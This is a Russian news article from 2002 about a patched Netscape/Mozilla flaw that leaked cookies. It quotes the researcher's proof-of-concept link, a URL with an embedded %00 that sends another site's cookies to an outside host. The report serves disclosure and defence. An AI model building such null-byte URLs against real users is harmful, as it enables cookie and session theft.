Netscape и Mozilla отдают cookies на сторону Алексей Рерих 30.01.2002 13:46 версия для печати

В браузере Netscape Communicator обнаружена дыра, позволяющая злоумышленнику получить доступ к пользовательским cookies.

Уязвимое место, обнаруженное в Netscape, начиная с версии 6.0 и выше, аналогично дыре в браузере Mozilla версии 0.9.6 и более ранних, на движке которого создан последний Netscape.

И Netscape и Mozilla уже выпустили обновленные версии браузеров (Netscape 6.2.1 и Mozilla 0.9.7), в которых уязвимость устранена.

Сообщение об обнаружении уязвимого места помещено на сайте ZNep.com. Марк Слемко пишет в своем отчете, что для получения доступа к чужим cookies достаточно разместить на веб-странице или в электронном html-сообщении гиперссылку определенного вида. В результате оба браузера отсылают по указанному адресу cookies, предназначенные для совсем другого (любого другого) сайта.

В нормальной ситуации информация, сохраняемая в cookies, может быть прочитана только тем сервером, который ее записывал (или теми, в которых сервер кооперирован, то есть, находится в одном домене). Параметры браузера можно выставить таким образом, что cookies будет "отдаваться" только через безопасное SSL-соединение.

Однако обнаруженный Марком Слемко баг позволяет любому получать чужие cookies в обход всех этих защитный механизмов.

Баг был онаружен еще 15 ноября прошлого года. Тогда же Слемко отослал сообщение об обнаруженной дыре в Netscape и, после долгих поисков почтового адреса, разработчикам браузера Mozilla.

И только после того, как необходимые патчи и апгрейды были разработаны, Марк Слемко опубликовал информацию о дыре.

Собственно, сама дыра, по выражению самого Слемко, тривиальна: достаточно разместить на странице или в e-mail ссылку вида: http://alive.znep.com%00www.passport.com/cgi-bin/cookies. В результате клика по ссылке дырявые браузеры отошлют на сервер, адрес которого указан до %00, cookies предназначенные для сервера, адрес которого расположен после %00.

Несмотря на тривиальность исполнения, это нарушение безопасного соединения может привести к самым различным последствиям. Все зависит от того, какая информация о пользователе хранится на севере, доступ к cookies которого получен злоумышленником.

Аналогичные баги были не так давно обнаружены и в Microsoft Internet Explorer.

Скачать обновленную, залатанную версию барузеров можно на сайтах Netscape.com (здесь) и Mozilla.org.

Обсудить в форуме (Сообщений : 0)

ССЫЛКИ ПО ТЕМЕ

Nepscape
Mozilla
Mozilla Cookie Exploit - Отчет Марка Слемко, 22.01.02

МАТЕРИАЛЫ ПО ТЕМЕ

В Media Player спрятан шпион посильнее обычных cookies - 16.01.02
Дыра в IE позволяет подделать сертификат безопасности - 28.12.01
Европарламент одобрил запрещение cookies - 14.11.01
Новая дыра от Microsoft: ваши cookies может читать кто угодно - 12.11.01
Вячеслав Ансимов "Рамблер" и SpyLOG готовы к IE 6, обрезающему cookies - 28.08.01
Netscape 6.1 beta: жизнь после смерти - 14.06.01
Вячеслав Ансимов Netscape 6 - что это? - 17.11.00